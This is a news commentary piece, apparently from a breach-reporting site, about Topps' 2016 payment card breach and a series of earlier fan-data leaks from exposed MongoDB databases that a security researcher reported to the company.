Topps’ payment card breach was just its latest data security incident

A number of sites have now reported on Topps‘ recent disclosure that on October 12, it became aware of unauthorized access to payment card information for customers using the topps.com website between July 30 and October 12.

A copy of the sports card and memorabilia giant’s notification can be found on several state regulators’ sites but not, it seems on Topps’ site or even mentioned in their tweets. The notification says that compromised data may have included the customers’ names, addresses, email addresses, phone numbers, credit card and debit card numbers, card expiration dates, and card verification numbers. The number of customers potentially affected was not disclosed.

Once Topps became aware of the situation, they brought in a security firm and worked with that firm and their site development and hosting companies. “We stopped the incident and continue to work with our security firm to help prevent a similar incident from happening again,” the company claims in its notification.

To those who do not regularly follow breach reports, the Topps report may sound like just another breach disclosure of an e-commerce site getting compromised. It’s happened to so many others, too, right? As David Hill wrote on Fansided about Topps’s incident response:

While this may seem like locking the barn door after the proverbial horse was stolen, it is a hazard of anyone making online purchases. The biggest online retailers all have the same issues. And even with the best security that is out there, hackers and other criminals that are looking to access financial information can find a way to get what they want. Every company has the same concerns.

Topps may have had a possible data breach, but that does not affect our confidence in the company. I know that I’ll certainly be making purchases there going forward, trusting that they have fixed those issues.

David’s more trusting than I am. Why were full track data being stored, and without encryption? [Update: as “Gamma” points out in comments, it is likely that the data were captured during transmission and not from storage.] And would it affect his confidence if he knew that this wasn’t their first data security incident this year?

Other Data Security Incidents

In June, 2016, this site reported on a data leak involving Topps’ apps. The leak had been uncovered by Chris Vickery of the Mackeeper Security Research Center. After he turned to DataBreaches.net for assistance in getting a response from Topps, this site reported on June 24:

The exposed database was not the first time MacKeeper security researcher Chris Vickery had seen Topps mobile app fan data leaking. In early December, Vickery reports, he stumbled upon three separate, publically accessible databases containing what, on quick inspection, appeared to be hundreds of thousands of user account details for Bunt, Huddle, and Kick fans. A few days later, and without any intervention from Vickery, the databases were secured. Vickery never found out whether those were Topps’ databases or some contractor’s databases, but because they were secured, he reasonably just turned his attention to other databases that were currently exposed.

Several weeks ago, however, Vickery discovered another exposed and publically accessible database. This database, hosted on Amazon, contained all three apps’  fans’ data. As with so many other exposed databases, Vickery noted that it was a MongoDB installation that was open on port 27017.

As the post went on to explain, DataBreaches.net assisted Vickery in getting Topps notified so that they could secure customer data.  Those data did not include payment card data, but did include hundreds of thousands of fans’ profiles with their usernames and date of birth, as well as additional details of their trades and activity. Their investigation revealed that it was a contractor error that had resulted in the data leak.

So by June 24,  there had been two incidents of exposed data: one discovered in December, 2015 and then another one discovered in June, 2016. Now we learn that just days after being alerted to the second leak, and beginning July 1, customer payment card data was being accessed or acquired. Did Topps bring in any security firm back in June to really assess their security system-wide? Could the payment card data compromise have been prevented or detected earlier?

“But wait, there’s more!” as some ads claim. In September, Vickery had to contact Topps yet again over yet another data leak. Although it was not publicly revealed at the time, on September 13, Vickery informed DataBreaches.net that he had sent another notification to Topps concerning another Amazon bucket that was leaking because the MongoDB installation was open on port 27017.

“There aren’t hashed passwords or other very sensitive pieces of data exposed here, but it does have lots of spreadsheets with fields like username, email address, date of birth, and a few other bits related to the user’s Topps account,” Vickery wrote to them in September. Vickery also noted that there were many files exposed, with just one file alone exposing details on over 392,000 VIP Kick fans.

So in December of 2015, there was some data leak, in June, they learned of another data leak and addressed it, and in September, they were notified of yet more data leakage, and addressed that. But where and when was their comprehensive security review by any outside firm that might have prevented or detected the payment card compromise that began only days after they had been alerted to another security concern?

Three fan user data leaks and a payment card breach within one year. David Hill might be confident about using the Topps site, but how many strikes until you’re out?